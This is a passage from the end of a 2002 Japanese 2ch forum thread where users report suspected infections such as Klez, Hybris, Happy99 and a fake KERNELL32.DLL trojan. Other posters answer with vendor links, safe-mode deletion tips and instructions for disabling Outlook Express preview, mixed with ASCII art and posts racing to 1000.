これなんのウイルスでしょう!?感染してますかね?
かなりぴよってます。おしえてください

922 :916:02/05/06 01:07
>>918

ただの宣伝ではないかな?
ttp://www.sophos.co.jp/
大丈夫だとおもいます。




923 : :02/05/06 01:11
>>917
しかしまた古いもの食らったねぇ。
Happy99[1].exeはキャッシュでのファイル名だろ。
検索はHappy99.exeで腐るほどHITする。

924 :名無しさん@お腹いっぱい。:02/05/06 01:12
すいません、なんかメールがいろんなところに勝手に送っているらしいのですが
なにかウィルスが原因なのでしょうか?

925 :名無しさん@お腹いっぱい。:02/05/06 01:13
>>924
たぶん・・・そう

926 :名無しさん@お腹いっぱい。:02/05/06 01:16
しかもいろんな所からメール来るようになってる…友人の知りあいとか…
BOOTLOG.TXT見たいな添付ファイルあったり…

927 :名無しさん@お腹いっぱい。:02/05/06 01:16
>>921
MSのパッチ入れてなければ逝かれてる。
http://ime.nu/housecall.antivirus.com/housecall/start_jp.aspでスキャンしる。


928 : :02/05/06 01:17
>>924
ネットに繋ぐなよっ!

929 :名無しさん@お腹いっぱい。:02/05/06 01:19
>>926
いつからだよ
はよ対策しろ

930 :名無しさん@お腹いっぱい。:02/05/06 01:20
ていうか、OEとかつかうなって。

931 :名無しさん@お腹いっぱい。:02/05/06 01:21
>>921
もしかしてタイトルにnewgameみたいなの書いてるメール来なかった?

932 ::02/05/06 01:21
>>919 >>920
キャッシュを全部削除してもう一度スキャンしてみました。
やっぱりウイルスは検索されませんでした。
ちょっと気になるけど一件落着とします。

>>923
Happy99で検索しましたが、やはり1つも見つかりません・・・

レス下さった方、どうもありがとうございました!

933 :名無しさん@お腹いっぱい。:02/05/06 01:25
>>929
たった今さっき。


934 : :02/05/06 01:34
>>932
どこ探したんだ?

935 :ACPI:02/05/06 01:43
win2Kで起動時に、問題解決と何たらにはF8キーを押して云々、の直後に、
グレーだかブルーだかの画面に英語で、
「ACPIが古いので起動できません、BIOSをageろや」と出ます。
CDから再インストール時も同じ症状。
仕方がないので再インストールオプションでF7を押してACPIを切り、
CDから修復を選択すると、
「windowsは壊れていますが修復できません」
とのたまいます。

MBRか何かに変なのが住み着いているのでしょうか?


936 :名無しさん@お腹いっぱい。:02/05/06 01:50
>>935
ハード障害だろ。

937 ::02/05/06 01:50
>>934

\Windows\System内です。
あと>>913のウイルスデータベースを元に
HAPPYxx.EXE、SKA.EXE、SKA.DLL、LISTE.SKA、Happy99などのキーワードで
HDD(C)と(D)の全ファイルとフォルダを検索しました。
>>914に書いたファイルもありませんでした。


938 :921:02/05/06 01:51
>>931 以前に?来たような・・てゆうか来た。と思う。
それが何か・・・ こわいよう

>>927 WINDOWSUPDATEの重要な更新(パッチとか)はしょっちゅう確認
して全部入れてます。なら大丈夫ですかね??
なんのウイルスなんだろ 自動実行されたのは初めてです かなりビビッテル

939 :名無しさん@お腹いっぱい。:02/05/06 01:52
>>938
なんか今日それ以降ずるずるメール来つづけている…


940 :921:02/05/06 01:53
http://ime.nu/housecall.antivirus.com/housecall/start_jp.asp
みたいなとこでスキャンして感染0だったらまず大丈夫といえるんですかね?

941 :360:02/05/06 01:55
>>940
ん?
感染したらスキャンもちゃんとかからんと思うぞ。

942 :名無しさん@お腹いっぱい。:02/05/06 01:56
>>938
なら大丈夫。
midでメディアプレイヤーが起動するのは仕様。パッチあててないとその後midに見せかけたexeが起動する。

943 :921:02/05/06 01:57
>>941
??
じゃなんのためにスキャンするの?


944 :921:02/05/06 01:58
>>942
はぁ・・良かった。ありがとうございました。
かきこみまくってすんまそんでした

945 :ACPI:02/05/06 01:59
>936
ん〜、それがさ、自作マシン2台やって同じ症状なのよ。
そんな簡単に電源とかBIOSとか障害でるものかなぁ?


946 : :02/05/06 02:00
>>937
わかんねーのにPC内を探したってしょうがねーだろ。
ネットで対策などを探せと言ってんの!

947 :360:02/05/06 02:01
>>943
たしか感染するとウイルススキャンとか駆除を妨害するんじゃなかったかな?
やってみても構わんが、信頼していいものやら。


948 :名無しさん@お腹いっぱい。:02/05/06 02:08
http://www.trendmicro.co.jp/klez/tool.asp

他スレから引っ張ってきた。

949 :名無しさん@お腹いっぱい。:02/05/06 02:15
>>945
どうやって2台で症状が出てるのか分からない。
どう確認したんだ?

950 :ACPI:02/05/06 02:27
>949
HDD繋ぎ変えただけです。

951 : :02/05/06 02:31
>>950
それじゃ2台で確認したことにならんだろ

952 :名無しさん@お腹いっぱい。:02/05/06 02:39
>>950
スキャンディスクしろ。
フォーマットしてから使え。

953 :名無しさん@お腹いっぱい。:02/05/06 02:40
>951
即レスありがとうございます。
明日もう一度顛末を報告しますです。
# もう次スレかな?

954 :名無しさん@お腹いっぱい。:02/05/06 03:30
オンラインスキャンでWORM_HYBRIS.Mに感染している事がわかりました。
駆除できないから、ファイルを削除しろとあったのですが、
C:WINDOWS:SYSTEMにあるみたいなんですけど、どうやればいいのか教えてください。
SYSTEMフォルダを削除しようとしても、できません。

955 :名無しさん@お腹いっぱい。:02/05/06 03:36
>>954
SYSTEMフォルダを削除したら大変だ(w
もう一度よく読め
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.M

956 :名無しさん@お腹いっぱい。:02/05/06 03:41
SYSTEMフォルダを削除しようとしても、できません。



ポカ━━ΣΣ(゚Д゚;)━━ン

957 :あきらめなさい!:02/05/06 03:59
         _,ノ‐''''''^¨¨¨⌒ ̄⌒^^''¬-、,_ 
        ._v-''¨`.,,vー─-、    .,,vー─-、  .¨'ーu_       
      _ノ'″  ./′    ¨┐ ./     ゙'┐   .゙'┐      
     ,/′   ./       .ミ .i′      .)     ゙\    
    ,/′     < ̄● ̄> | |< ̄● ̄>       \   
   ./′    ._,,、-ミ.    .  /¨レ       .人,_      ミ  
  .,ノ′  ._ノ'″  \_   ._,rlト冖へy   _/  ¨'‐u     .゙lr  
 .,i′  /ー-v、.,,_   ¨^^¨´〔    〕.¨^^¨′  __.,、 ゙\.    { 
 〕   ./′    .⌒'''''    \,,,,,,ノ′  v-ー'''¨′   ゙┐   }    __________
 |   ノ  .────ー      }      __,,.,、v--ー''  {   .]  /
 |  :|        .__,..      .!      `         .}  .} < もう、だめぽ! 
 }  .|   .--:;:冖^ ̄       .|      ¨¨¨¨¨¨゙フ¨¨′ .}  }  \
 .|  .}    .\_         .}        ._/    }  .:|     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ). .〕      .゙ミzu,_      }      _,ノ┘      }  /  
  .{  ).    .,/'″  ¨゙(ァv、,_  .!  ._,,,,v‐'^′       ,ノ  ノ  
   ミ. 7,   .i゙      〔  `¨¨^^⌒           ,ノ′,/   
   ゙). ゙li. _ノi.     ノ                 .,r′.,ノ   
    \ ゙>'′^ー、、、v‐′               .,r′ /    
     .|/      }                ./′,/     
    ./′      ,i¨¨¨¨¨¨゙ソ冖干ア^^^^^^^^^^^| r'′      
    .,i′      ./¬冖'''''7′   ∨¬ーーz─-「 \

958 :名無しさん@お腹いっぱい。:02/05/06 04:01
気がすむまで笑ってくださいよ(´・ω・`)

959 : :02/05/06 04:07
はじめまして。
私のところに初めてウイルス(らしき物…限りなく黒に近いです)が届きました。

A very funny game
という件名のメールで添付ファイル付きで来ました。

添付ファイルはまだ開けていません。

トレンドマイクロのウイルスバスター・オンラインでは何も引っかかりませんでした。
ノートン先生をライブUPデートしても同じです。
「ウイルスは検出されませんでした」と表示がでます。

ウイルスであるのは確実だと思うんですが、何というウイルスなんでしょうか?
また、添付ファイルを開いていないのでひょっとしてまだ感染していないんでしょうか…?
(今の時点でメールを削除すれば大丈夫、ということなら救われるんですが)

詳しい方のアドバイスが頂けたら幸いです<(__)>



960 :名無しさん@お腹いっぱい。:02/05/06 04:10
>>959
Klez系,Klez.Eスレッド
http://pc.2ch.net/test/read.cgi/sec/1018248786/
全部嫁

961 :名無しさん@お腹いっぱい。:02/05/06 04:11
怪しいと思ったら即消す!!

962 : :02/05/06 04:17
>>960
Klez系というウイルスの系統なんですか。
ありがとうございます。
さっそく読んできます。

>>961
質問するのにそのメールがあった方が良いかと思ったのですが…。
アドバイスありがとうございます、消しました。

963 :954:02/05/06 04:21
SYSTEMの中にRESTOREというファイルがあったのですが、
これなんですか?なんか、もうわかりません。

964 :名無しさん@お腹いっぱい。:02/05/06 04:26
   (゚д゚)ウマー
 (゚д゚)( ゚д゚)ウマー     (゚д゚)ウマー
(゚д゚)(゚д゚)(゚д゚)ウマー (゚д゚)(゚д゚)ウマー
 (゚д゚)(゚д゚)ウマー  (゚д゚)(゚д゚)(゚д゚)ウマー
   |//         (゚д゚)(゚д゚)ウマー
   |            |//
   |     ワーイ    /
   |   ∧ ∧    /
   |   (,,・∇・)   /    ⊂,'⊃
   | ̄| ̄ ̄ ̄ ̄ ̄~|
   |  |954|
   |  |       _|
    ̄ ̄ ̄ ̄ ̄ ̄

   /  ̄ ̄\               〜〜〜〜
⊂⊃             /\     ⊂⊃
/⊂⊃        \/   \ /\  ⊂⊃  /\
〜〜〜〜        \     \     /\/   \
                        /  /       \



965 :名無しさん@お腹いっぱい。:02/05/06 04:29
>>963
OSと使った駆除ツールの出所を。

966 :954:02/05/06 04:30
もういいや、そのままにしておこう

 ∧||∧
(  ⌒ ヽ  
 ∪  ノ
  ∪∪


967 : (959です):02/05/06 04:33
バカみたいな質問かもしれませんがOEでプレビューというのをしないようにするにはどうすればいいんでしょうか?
プレビューしてはいけない、と書いてあったのですが…。

968 :名無しさん@お腹いっぱい。:02/05/06 04:38

OEの画面、上の「表示」をクリック→「レイアウト」をクリック
「プレビューウィンドウを表示する」のチェックをはずし
「適用」をクリック、「OK」をクリックする。

969 :954:02/05/06 04:43
Windows MEです 
駆除できないってあるので駆除ツールは使っていないですけど

970 : (959です):02/05/06 04:43
たいへんお世話になりました。
これでいったん寝ることができます。

対策(OE5.0を6.0にするなど)は明日頑張る予定です。
みなさんおやすみなさい<(__)>


971 :質問です。:02/05/06 04:48
昨日、トレンドマイクロのオンラインウイルスチェックを実行したところ、
TOROJ_DESTINY.B が WINDOWS Download Program Files\KERNELL32.DLL内で検出されてしまいました。
該当ファイルをマイコンから探してみたところ、そのファイルは見つからず、
Traker ClassというActiveXコントールの依存関係のところに表示されている
\WINDOWS DOWNLOAD..\KERNELL32.DLLが該当物のようです。

オンラインウイルスチェックではウイルスの駆除はできず、
削除だけできるということなので、削除しても差しさわりのない物なのか
googleでActiveXとKERNELL.DLL検索してみましたが、
むやみに削除するとOSの動作に支障が出る旨が書かれていたので、
慌ててウイルスバスター体験版をインストールして、
ウイルススキャンを実行したのですが、こちらではウイルスは検出されませんでした。

となると、オンラインウイルスチェックのほうから、この該当物を削除するしか
方法はないのでしょうか?OSの動作に支障はでないものなんでしょうか?

ちなみにTOROJ_DESTINY.Bのウイルス名はマカフィー、トレンドマイクロ、シマンテックの
ウイルス情報で探してみましたが、載っていませんでした。
よってそれ専用の駆除ツールもないようですが・・・

どなたか対処法ご存知の方がいらっしゃいましたら教えていただけませんか?
お願いします。




972 : :02/05/06 04:57
>>971
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DESTINY.A&VSect=T

973 :971:02/05/06 06:36
>>972
レスありがとうございます。
再度オンラインチェックをして、削除しようとしたのですが、
「使用中のため削除できません。」となってしまい削除できません。
回線接続可能状態にあるのがいけないのかとも思い、
そこでオンラインスキャンのプログラムと
更新モジュールのDLが終わった直後に回線を切断して抜き去った状態で
再度検索してみましたが、
同様に「使用中のため、削除できません。」となってしまいました。

なおこの際、ウイルス検索結果表示画面では、
駆除可能項目の部分が、「アクセス不可」になっていました。
先にチェックを実行した折には、その項目は「いいえ」だったのですが・・・

手動でウイルスが入っていると思われるActiveXコントロールを
削除するしかないのでしょうか?
初心者なもので、ウイルスが入っていると推測している部分を
手動で削除するのは避けたいのですが・・・
そうするしかないのでしょうか?

974 :cheshire-cat:02/05/06 06:44
972の人のリンク先
>備考)"TROJ_DESTINY.A"として検知するファイルは、"KERNELL32.DLL"という名称が確認されています。
>Windows のシステムディレクトリに"KERNEL32.DLL"という名称のファイルがありますが、こちらは Windows の標準ファイルです。

「使用中で削除できない」、それならばセーフモードで再起動後に削除しれ。
ダメならコマンドプロンプト。

ちなみにSymantecでの検出名はこれ
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.destiny.html



975 :971:02/05/06 08:07
>>972&974
セーフモードで無事削除できました。
どうもありがとうございました。


976 :名無しさん@お腹いっぱい。:02/05/06 11:08
トレンドマイクロのオンラインウイルスチェックで

JP_SPWAN

というのが検出されてしまったのですが、
これは手動で削除することはできないでしょうか?

ウイルスソフトはつかっていません。
再インストールしか手はないのでしょうか?

どなたか助けてください。

977 : :02/05/06 11:58
>>976
検出されたときに削除しなかったのなら何もなしでは無理

978 :名無しさん@お腹いっぱい。:02/05/06 12:38
折れも
オンラインウイルスチェックしてみたら
VBS.SEEKER.A
ってのがでてきました。
なんでしょうこれ?
誰か知ってる方おられません?

979 : :02/05/06 12:41
>>978
ウィルスに決まってんだろ!
いちいち聞かないで探せよ!

980 :初心者です:02/05/06 12:42
backdoor trojanというのに感染していますた。
削除しようとするとWINDOWSが使用していますと出ます。
対策を具体的に教えてください!

981 : :02/05/06 12:44
>>979
いちいち聞かないで探せよ!

982 :名無しさん@お腹いっぱい。:02/05/06 12:48
>>980
いちいち聞かないで探せよ!

983 :教えて君たちへ:02/05/06 15:16
ウィルス名、ワーム名が分かったら検索サイトで検索しろ。
http://www.google.co.jp/


984 :名無しさん@お腹いっぱい。:02/05/06 15:20
添付はなく、NAV2002を素通りしたメールのソースを覗いたところ
(略)
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>

<FONT>W32.Elkern is a dangerous virus that can infect on Win98/Me/2000/XP.<br>
Trendmicro give you the W32.Elkern removal tools<br>
<br>
For more information,please visit http://www.Trendmicro.com</FONT></BODY></HTML>
(以下略)
とありました。
124KBの容量も気になります。
これはウィルスを送ろうとして失敗したのでしょうか?
受信後オンラインスキャンし、感染していないことは確認しました。

985 :名無しさん@お腹いっぱい。:02/05/06 21:43
ノートン先生をPCに入れてても
gooのフリーメール開けてウィルス感染ってするの?
添付ファイル開かなくてもプレビュー感染するときもあるでしょ?

怪しいメールがたくさん届いてるんですけど、
開けたくてウズウズしてる…



986 :名無しさん@お腹いっぱい。:02/05/06 22:14
>>985 マルチすんな

987 :名無しさん@お腹いっぱい。:02/05/06 23:25
おい、お前ら次スレ立ててください。

988 :名無しさん@お腹いっぱい。:02/05/06 23:45
>>987
ちょっと待ってください

989 :名無しさん@お腹いっぱい。:02/05/06 23:49
☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/test/read.cgi/sec/1020696417/l50

990 :名無しさん@お腹いっぱい。:02/05/07 00:15
Z涸れ
2ゲトズサーも入らずに綺麗に立った。

991 :( "´,д、`゙)旦 フウゥゥ〜…:02/05/07 01:35
1000までもう少し

992 :うすどん:02/05/07 08:01
オレも手伝う。

993 :名無しさん@お腹いっぱい。:02/05/07 08:31
ワームさんでてってくんない!

994 : :02/05/07 11:09
ここは1000場にならないな・・・

995 :( "´,д、`゙)旦 フウゥゥ〜…:02/05/07 12:44
とっちゃおうか・・・

996 :あぁ。。:02/05/07 12:52
2重カキコがやっかいだ。。。

997 :( "´,д、`゙)旦 フウゥゥ〜…:02/05/07 12:53
もう少し

998 :いいの?:02/05/07 12:54
あと少し・・・

999 :999:02/05/07 12:55
┌(_Д_┌ )┐)))))))

1000 :( "´,д、`゙)旦 フウゥゥ〜…:02/05/07 12:56
               ┌┐                                ●●●
    人          ││                              ●\  ●\
   ノ二\  ナ ゝゝ   V                 ●●●        ●\     ●\
     /   / 乙 つ  O               ●\   ●\      ●\       ●\
                  ●●●        ●\     ●\    ●\       ●\
                 ●\   ●\      ●\      ●\    ●\        ●\
       ●●\     ●\     ●\    ●\       ●\   ●\        ●\
        ●\    ●\      ●\    ●\       ●\    ●\       ●\
        ●\    ●\      ●\    ●\      ●\    ●\     ●\
       ●\    ●\       ●\    ●\      ●\      ●\    ●\
       ●\    ●\      ●\    ●\     ●\        ●●● \
      ●\     ●\      ●\      ●\   ●\           \\\
      ●\     ●\     ●\        ●●● \
     ●\      ●\   ●\           \\\
     ●\        ●●● \                              ┌┐ ┌┐
    ●\          \\\      ┣━┳┃┃      ┃          ││ ││
   ●●●\                      ┃   ┃┃┃ ┣┓ ━╋ ━╋  V   V
   \\\\                     ┛     ━┛ ┃   ┏┫ ┏┫  O  O
.  ∧∧       (´⌒(´
  (゚Д゚;) ∩∩  (´⌒;;;≡≡≡
  ⊆⊂´ ̄  ソ  (´⌒(´⌒;;
     ̄ ̄ ̄   ズザーーーーーッ


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

317 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)